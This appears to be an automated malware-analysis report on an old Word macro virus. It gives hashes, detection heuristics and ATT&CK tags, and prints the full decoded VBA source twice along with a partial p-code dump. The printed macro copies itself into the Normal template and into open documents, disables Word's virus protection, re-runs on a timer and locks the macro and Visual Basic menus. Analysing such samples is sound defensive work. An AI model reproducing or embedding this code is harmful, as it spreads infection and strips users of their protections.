Office (OLE) malware analysis — malicious · df7cfec859d7fb36

MALICIOUS

Office (OLE)

43.0 KB Created: 2001-03-02 10:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d4993d25d15a9ea682f5d6cf688f91af SHA-1: 441714920cb11a357ff3c9e0ee2848dfc260b901 SHA-256: df7cfec859d7fb3693ecda721af2c60dfc58b78f3d4ac2ed7beaf54a37cab4e9

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word document containing a VBA macro. The AutoOpen macro is designed to copy itself to the Normal template and the active document, indicating an attempt to establish persistence. The presence of legacy WordBasic auto-exec markers and the detection as Win.Trojan.W97M-13 further support its malicious nature. The macro's logic suggests it aims to ensure its execution across multiple documents.

Heuristics 4

ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.W97M-13
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10774 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10774 bytes
SHA-256: `94344e13cb3de5c6a21256f4f445bba7853b122243efa07afd88dcc3b96e1420`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" Option Explicit Public Sub MAIN() Dim MyFile$ Dim OkExist Dim TemplateName$ Dim internal Dim xItem Dim t Dim s '设置错误陷阱 On Error Resume Next '获取活动文件名 If ActiveDocument.Path = "" Then MyFile$ = ActiveDocument.Name Else MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name End If If MyFile$ = "" Then GoTo Bye '整点出现日期时间信息 t = Format(Time, "hhmmss") If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then MsgBox s, vbSystemModal, "CPSDI" 'MsgBox Format(Date, "dddd,yyyy mmm dd") + "日 " + Format(Time, "hh") + "时", vbSystemModal, "我的提醒" End If ' 在通用模板中查找是否有AutoOpen宏 OkExist = 0 For Each xItem In NormalTemplate.VBProject.VBComponents If xItem.Type = 1 And xItem.Name = "AutoOpen" Then OkExist = 1 Exit For End If Next xItem ' 获取通用模板的文件名 TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name '设置通用模板的文件属性为档案并解除其病毒防护功能 SetAttr TemplateName$, vbNormal Options.VirusProtection = False ' 拷贝AutoOpen宏到通用模板 If OkExist <> 1 Then Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems End If ' 在活动文档中查找是否有AutoOpen宏 OkExist = 0 For Each xItem In ActiveDocument.VBProject.VBComponents If xItem.Type = 1 And xItem.Name = "AutoOpen" Then OkExist = 1 Exit For End If Next xItem '拷贝AutoOpen宏到活动文档 If OkExist <> 1 Then Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems End If Bye: ' 设置自动运行AutoOpen宏的计时器 internal = "00:" + Str(10 - Val(Mid(t, 4, 1))) Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60 DisableMacroMenu DisableVBTools End Sub Public Sub DisableMacroMenu() '使工具菜单中的宏命令组失去作用 Dim cb, xItem, xxItem, xxxItem For Each cb In ActiveDocument.CommandBars If cb.Name = "Menu Bar" Then For Each xItem In cb.Controls If xItem.Caption = "工具(&T)" Then For Each xxItem In xItem.Controls If xxItem.Caption = "宏(&M)" Then 'xxItem.Enabled = True For Each xxxItem In xxItem.Controls xxxItem.Enabled = False Next xxxItem Exit Sub End If Next xxItem End If Next xItem End If Next cb End Sub Public Sub DisableVBTools() '使工具栏中的Visual Basic失去作用 Dim cb For Each cb In ActiveDocument.CommandBars If cb.Name = "Visual Basic" Then cb.Enabled = False Exit For End If Next cb End Sub ' Processing file: /opt/analyzer/scan_staging/05b1c6f8ddb44920a0c5b4a8c4ce4401.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1182 bytes ' Macros/VBA/AutoOpen - 5780 bytes ' Line #0: ' Option (Explicit) ' Line #1: ' Line #2: ' FuncDefn (Public Sub MAIN()) ' Line #3: ' Line #4: ' Dim ' VarDefn MyFile ' Line #5: ' Dim ' VarDefn OkExist ' Line #6: ' Dim ' VarDefn TemplateName ' Line #7: ' Dim ' VarDefn internal ' Line #8: ' Dim ' VarDefn xItem ' Line #9: ' Dim ' VarDefn t ' Line #10: ' Dim ' VarDefn s ' Line #11: ' Line #12: ' QuoteRem 0x0000 0x000C "设置错误陷阱" ' Line #13: ' OnError (Resume Next) ' Line #14: ' Line #15: ' QuoteRem 0x0000 0x000E "获取活动文件名" ' Line #16: ' Ld ActiveDocument ' MemLd Path ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #17: ' Ld ActiveDocument ' MemLd New ' St MyFile$ ' Line #18: ' ElseBlock ' Line #19: ' Ld ActiveDocument ' MemLd Path ' LitStr 0x0001 "\" ' Add ' Ld ActiveDocument ' MemLd New ' Add ' St MyFile$ ' Line #20: ' EndIfBlock ' Line #21: ' Line #22: ' Ld MyFile$ ' LitStr 0x0000 ... (truncated)

SHA-256: 94344e13cb3de5c6a21256f4f445bba7853b122243efa07afd88dcc3b96e1420

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Option Explicit

Public Sub MAIN()

Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s

'设置错误陷阱
On Error Resume Next

'获取活动文件名
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

If MyFile$ = "" Then GoTo Bye

'整点出现日期时间信息
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "日 " + Format(Time, "hh") + "时", vbSystemModal, "我的提醒"
End If


' 在通用模板中查找是否有AutoOpen宏
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' 获取通用模板的文件名
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

'设置通用模板的文件属性为档案并解除其病毒防护功能
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' 拷贝AutoOpen宏到通用模板
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' 在活动文档中查找是否有AutoOpen宏
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

'拷贝AutoOpen宏到活动文档
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' 设置自动运行AutoOpen宏的计时器
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
'使工具菜单中的宏命令组失去作用
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "工具(&T)" Then
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "宏(&M)" Then
            'xxItem.Enabled = True
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
Public Sub DisableVBTools()
'使工具栏中的Visual Basic失去作用
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub


' Processing file: /opt/analyzer/scan_staging/05b1c6f8ddb44920a0c5b4a8c4ce4401.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/AutoOpen - 5780 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	QuoteRem 0x0000 0x000C "设置错误陷阱"
' Line #13:
' 	OnError (Resume Next) 
' Line #14:
' Line #15:
' 	QuoteRem 0x0000 0x000E "获取活动文件名"
' Line #16:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	St MyFile$ 
' Line #18:
' 	ElseBlock 
' Line #19:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Add 
' 	St MyFile$ 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld MyFile$ 
' 	LitStr 0x0000
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.